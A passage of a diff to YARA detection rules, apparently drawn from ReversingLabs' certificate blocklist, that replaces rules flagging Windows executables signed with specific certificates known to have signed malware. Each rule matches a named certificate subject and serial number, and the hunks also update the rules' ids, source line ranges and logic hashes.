-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14876-L14892"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8962-L8980"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5febbce8c39440bfc4846f509f0b1dd4f71a8b4dc24fa18afb561d26e53c2446"
+		logic_hash = "2e004116d0f8df5a625b190127655926336fc74b4cce4ae40cd516a135e5d719"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26885,21 +49279,21 @@ rule REVERSINGLABS_Cert_Blocklist_1B7B54E0Dd4D7E45A0B46834De52658D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "1b:7b:54:e0:dd:4d:7e:45:a0:b4:68:34:de:52:65:8d" and 1476662400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trade Hunters, s. r. o." and ( pe.signatures [ i ] . serial == "00:fb:b1:19:8b:d8:bd:db:0d:69:3e:b7:2a:86:13:fe:3f" or pe.signatures [ i ] . serial == "fb:b1:19:8b:d8:bd:db:0d:69:3e:b7:2a:86:13:fe:3f" ) and 1620000000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B63E4299D0B0E2Dcdaeb976167A23235 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_846F77D9919Fc4405Aefe1701309Bd67 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "44af31cc-e0c9-5f3f-9645-a0453bc81e62"
+		id = "c326fbf0-2d95-5aa1-9ae4-6cb04b9c2212"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14894-L14912"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8982-L9000"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "da7415d0bc0245dea6a4ec325da5140c79c723c20fb7c04ff14f59a3089a5c88"
+		logic_hash = "6739049a61183d506daf9aaf44a3b15cbf2234c6af307ec95bc07fa3d8501105"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26909,21 +49303,21 @@ rule REVERSINGLABS_Cert_Blocklist_B63E4299D0B0E2Dcdaeb976167A23235 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Baltservis LLC" and ( pe.signatures [ i ] . serial == "00:b6:3e:42:99:d0:b0:e2:dc:da:eb:97:61:67:a2:32:35" or pe.signatures [ i ] . serial == "b6:3e:42:99:d0:b0:e2:dc:da:eb:97:61:67:a2:32:35" ) and 1604102400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IPM Skupina d.o.o." and ( pe.signatures [ i ] . serial == "00:84:6f:77:d9:91:9f:c4:40:5a:ef:e1:70:13:09:bd:67" or pe.signatures [ i ] . serial == "84:6f:77:d9:91:9f:c4:40:5a:ef:e1:70:13:09:bd:67" ) and 1621382400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1Dabae616705F5A51152Eac48423F354 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0939C2Bad859C0432E8E98A6C0162C02 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8b050402-d5d3-5733-9a72-02386d850a04"
+		id = "5dba4570-51d8-5c23-85a5-5de9a048793f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14914-L14930"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9002-L9018"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0bb14ececa3a78e1a2e71cfdee8bc57678251b15151d156ef5fa754b2438ee35"
+		logic_hash = "3c48241e52e58600bfa0385742831dba59d9cbd959cd6853fe8e030f5df79c23"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26933,21 +49327,21 @@ rule REVERSINGLABS_Cert_Blocklist_1Dabae616705F5A51152Eac48423F354 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "1d:ab:ae:61:67:05:f5:a5:11:52:ea:c4:84:23:f3:54" and 1470960000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Activ Expeditions ApS" and pe.signatures [ i ] . serial == "09:39:c2:ba:d8:59:c0:43:2e:8e:98:a6:c0:16:2c:02" and 1615939200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_50D08F3C9Bf86Fba52Cf592B4Fe6Eacf : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7Fba0E19919Ac50D700Ba60250D02C8B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f315cdda-4b95-534d-94db-9a04e2da6385"
+		id = "8828c863-2800-5f66-968e-96a41a071218"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14932-L14948"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9020-L9036"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ca613e4b45b9bb1ef7564b9fc6321bccc0f683298de692a3db2bf841db9010ef"
+		logic_hash = "8c803111df930056bdc3ef7560f07bf4d255b93286d01ecc55f790e72565ba5d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26957,21 +49351,21 @@ rule REVERSINGLABS_Cert_Blocklist_50D08F3C9Bf86Fba52Cf592B4Fe6Eacf : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CLEVERCYBER LTD" and pe.signatures [ i ] . serial == "50:d0:8f:3c:9b:f8:6f:ba:52:cf:59:2b:4f:e6:ea:cf" and 1518134400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Diamartis" and pe.signatures [ i ] . serial == "7f:ba:0e:19:91:9a:c5:0d:70:0b:a6:02:50:d0:2c:8b" and 1623196800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7C7Fc3616F3157A28F702Cc1Df275Dcd : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_A758504E7971869D0Aec2775Fffa03D5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "78d2adb9-fc1c-5f48-80cb-3f1bd12b6ba5"
+		id = "cc8c0cca-1848-5a5e-a421-c5ecdea6ba53"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14950-L14966"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9038-L9056"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c2dcea21c7a3e3aef6408f11c23edbce6d8f655f298654552a607a9b0caabb28"
+		logic_hash = "dcb1ac4c7dcbebd0a432515da82e4a97be6c6c2a54f9d642aa8c1a2bcbdce5de"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26981,21 +49375,21 @@ rule REVERSINGLABS_Cert_Blocklist_7C7Fc3616F3157A28F702Cc1Df275Dcd : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CFES Projects Ltd" and pe.signatures [ i ] . serial == "7c:7f:c3:61:6f:31:57:a2:8f:70:2c:c1:df:27:5d:cd" and 1522972800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Amcert LLC" and ( pe.signatures [ i ] . serial == "00:a7:58:50:4e:79:71:86:9d:0a:ec:27:75:ff:fa:03:d5" or pe.signatures [ i ] . serial == "a7:58:50:4e:79:71:86:9d:0a:ec:27:75:ff:fa:03:d5" ) and 1623628800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_73Ed1B2F4Bf8Dd37A8Ad9Bb775774592 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_37A67Cf754Ee5Ae284B4Cf8B9D651604 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "19c9e100-b017-5b5c-8e8f-c94ea9e228c2"
+		id = "e85434e1-1ef5-5660-8ba6-b35cbbe7510d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14968-L14984"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9058-L9074"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "69865935e07ea255a5d690e170911b33574ea61550b00bebc2ceff91ba9a33da"
+		logic_hash = "22cb71eebbb212a4436847c11c7ca9cefaf118086b024014c12498a6a5953af5"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27005,21 +49399,21 @@ rule REVERSINGLABS_Cert_Blocklist_73Ed1B2F4Bf8Dd37A8Ad9Bb775774592 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "5000 LIMITED" and pe.signatures [ i ] . serial == "73:ed:1b:2f:4b:f8:dd:37:a8:ad:9b:b7:75:77:45:92" and 1528243200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORTH PROPERTY LTD" and pe.signatures [ i ] . serial == "37:a6:7c:f7:54:ee:5a:e2:84:b4:cf:8b:9d:65:16:04" and 1617321600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_211B5Dfe65Bc6F34Bc9D3A54 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_119Acead668Bad57A48B4F42F294F8F0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5181b6e4-6a25-58f6-88c5-0eae98250648"
+		id = "7ec33498-b299-58e0-be42-9e4fb9549e28"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14986-L15002"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9076-L9092"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "cf2e4c0dd98efb77c28b63641196c83e60afc0d6ab64802743c351581506dbb5"
+		logic_hash = "61c49c60fc4fd5d654a6376fcee43e986a5351f085a5652a3c8888774557e053"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27029,21 +49423,21 @@ rule REVERSINGLABS_Cert_Blocklist_211B5Dfe65Bc6F34Bc9D3A54 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RAFO TECHNOLOGY INC" and pe.signatures [ i ] . serial == "21:1b:5d:fe:65:bc:6f:34:bc:9d:3a:54" and 1526717931 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PB03 TRANSPORT LTD." and pe.signatures [ i ] . serial == "11:9a:ce:ad:66:8b:ad:57:a4:8b:4f:42:f2:94:f8:f0" and 1619654400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5400D1C1406528B1Ef625976 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7A6D30A6Eb2Fa0C3369283725704Ac4C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2b35f2db-ebf1-5533-858c-644dbd6dfb2b"
+		id = "b7830a3a-ddcc-54ef-84dd-5d4b13863f90"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15004-L15020"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9094-L9110"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "fbdd37e050d68c4287e897f050a673aea071df105a35b07475d3233da3f03feb"
+		logic_hash = "788abb53ed7974d87c1b1bdbe31dcd3e852ea64745d94780d78d1217ee0206fe"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27053,21 +49447,21 @@ rule REVERSINGLABS_Cert_Blocklist_5400D1C1406528B1Ef625976 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "54:00:d1:c1:40:65:28:b1:ef:62:59:76" and 1474266628 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trade By International ApS" and pe.signatures [ i ] . serial == "7a:6d:30:a6:eb:2f:a0:c3:36:92:83:72:57:04:ac:4c" and 1619568000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_013472D7D665557Bfa0Dc21B350A361B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_670C3494206B9F0C18714Fdcffaaa42F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9b63f06d-9808-5936-aad2-d387c74eccdd"
+		id = "210a0c72-7eb7-5c78-bf5b-1ac292e7fa11"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15022-L15038"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9112-L9128"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ab908ef0fca56753bcba8bc85e2fdf5859b4e226c179ec5c6eb6eb3dc4014a8e"
+		logic_hash = "3b1e244b5f543a05beb2475020aa20dfc723f4dce3a5a0a963db1672d3295721"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27077,21 +49471,21 @@ rule REVERSINGLABS_Cert_Blocklist_013472D7D665557Bfa0Dc21B350A361B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yongli Zhang" and pe.signatures [ i ] . serial == "01:34:72:d7:d6:65:55:7b:fa:0d:c2:1b:35:0a:36:1b" and 1470960000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADRIATIK PORT SERVIS, d.o.o." and pe.signatures [ i ] . serial == "67:0c:34:94:20:6b:9f:0c:18:71:4f:dc:ff:aa:a4:2f" and 1622160000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_66C758A22Bfbbce327616815616Ddd07 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0E8Aa328Af207Ce8Bcae1Dc15C626188 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4a7130ad-8b66-52a1-afd2-6d10776b4451"
+		id = "9718f290-6ecd-5d67-9013-af99f98fffef"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15040-L15056"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9130-L9146"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "37f0f64e2d84ef6591e1f07a05abca35b37827d26c828269fb5f38d8546a60a7"
+		logic_hash = "4022abb8efbda944e35ff529c5b3b3c9f6370127a945f3eec1310149bb5d06e4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27101,21 +49495,21 @@ rule REVERSINGLABS_Cert_Blocklist_66C758A22Bfbbce327616815616Ddd07 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TIM Konstrakshn, TOV" and pe.signatures [ i ] . serial == "66:c7:58:a2:2b:fb:bc:e3:27:61:68:15:61:6d:dd:07" and 1469404800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PRO SAT SRL" and pe.signatures [ i ] . serial == "0e:8a:a3:28:af:20:7c:e8:bc:ae:1d:c1:5c:62:61:88" and 1627344000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E61B0366D940896430Bcfe3E93Baac5B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Cfad6Be1D823B4Eacb803B720F525A7D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "24eb38c1-48a5-5d9b-a42d-345c4fda6c36"
+		id = "844e295f-b22f-5eb0-9f98-0d6e574d2954"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15058-L15076"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9148-L9166"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1b1fd0c2237446ab22c7359d1e89d822a4b9b6ad345447740154d7d52635c2ea"
+		logic_hash = "d8005774e6011d8198039a6588834cd0b13dd728103b63c3ea8b6e0dc3878f05"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27125,21 +49519,21 @@ rule REVERSINGLABS_Cert_Blocklist_E61B0366D940896430Bcfe3E93Baac5B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRANS LTD" and ( pe.signatures [ i ] . serial == "00:e6:1b:03:66:d9:40:89:64:30:bc:fe:3e:93:ba:ac:5b" or pe.signatures [ i ] . serial == "e6:1b:03:66:d9:40:89:64:30:bc:fe:3e:93:ba:ac:5b" ) and 1528156800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sistema LLC" and ( pe.signatures [ i ] . serial == "00:cf:ad:6b:e1:d8:23:b4:ea:cb:80:3b:72:0f:52:5a:7d" or pe.signatures [ i ] . serial == "cf:ad:6b:e1:d8:23:b4:ea:cb:80:3b:72:0f:52:5a:7d" ) and 1627430400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6294B8Acc35Dea7D32A95Ac5D4536F8F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7Ebcb54B7E0E6410B28610De0743D4Dd : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bc380123-20fc-55de-ad1c-4f13ac173cc9"
+		id = "84140bbd-23a0-5355-9d1a-918cc93c3352"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15078-L15094"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9168-L9184"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ac92ff8e533121071a620ca5280ae66629576f9c4af9831ddac5bb487e4348af"
+		logic_hash = "c9444ff9e13192bf300afac12554bc4cc2defb37bb5b57906b6163db378c515a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27149,21 +49543,21 @@ rule REVERSINGLABS_Cert_Blocklist_6294B8Acc35Dea7D32A95Ac5D4536F8F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE9\\x87\\x8D\\xE5\\xBA\\x86\\xE6\\x8E\\xA2\\xE9\\x95\\xBF\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "62:94:b8:ac:c3:5d:ea:7d:32:a9:5a:c5:d4:53:6f:8f" and 1517443200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SIA \"MWorx\"" and pe.signatures [ i ] . serial == "7e:bc:b5:4b:7e:0e:64:10:b2:86:10:de:07:43:d4:dd" and 1625616000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_485E4626C32493C16283Cfd9E30D17Ad : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_01106Cc293772Ca905A2B6Eff02Bf0F5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7e6834e5-ce32-5ba6-82cf-99d7b90fb4f0"
+		id = "1ec81090-91a1-5019-be91-14f60d6722fc"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15096-L15112"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9186-L9202"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "faf860786e8473493d24abf6e61cf0b906e98d786516be6d2098181368214020"
+		logic_hash = "81e19c06de4546a2cee974230ef7aa15291f20f2e6b6f89c9b12107c26836b5e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27173,21 +49567,21 @@ rule REVERSINGLABS_Cert_Blocklist_485E4626C32493C16283Cfd9E30D17Ad : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "48:5e:46:26:c3:24:93:c1:62:83:cf:d9:e3:0d:17:ad" and 1473292800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DMR Consulting Ltd." and pe.signatures [ i ] . serial == "01:10:6c:c2:93:77:2c:a9:05:a2:b6:ef:f0:2b:f0:f5" and 1627084800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D0312F9177Cd46B943Df3Ef22Db4608B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_05Bb162F6Efe852B7Bd4712Fd737A61E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b36ba3c9-4a64-505a-ae27-ec8ee969dc29"
+		id = "82b2198e-140a-54d0-afa8-ad89980c7899"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15114-L15132"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9204-L9220"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2eb955e91c927980cee031c6284e48bad315e891c32cdaf41b844090e841c44d"
+		logic_hash = "d2fcbce0826c1478338827376d2c7869e5b38dc6d5e737a2f986600c6f71b1e6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -27197,21 +49591,21 @@ rule REVERSINGLABS_Cert_Blocklist_D0312F9177Cd46B943Df3Ef22Db4608B : INFO FILE
 		importance = 25
 
 	condition:
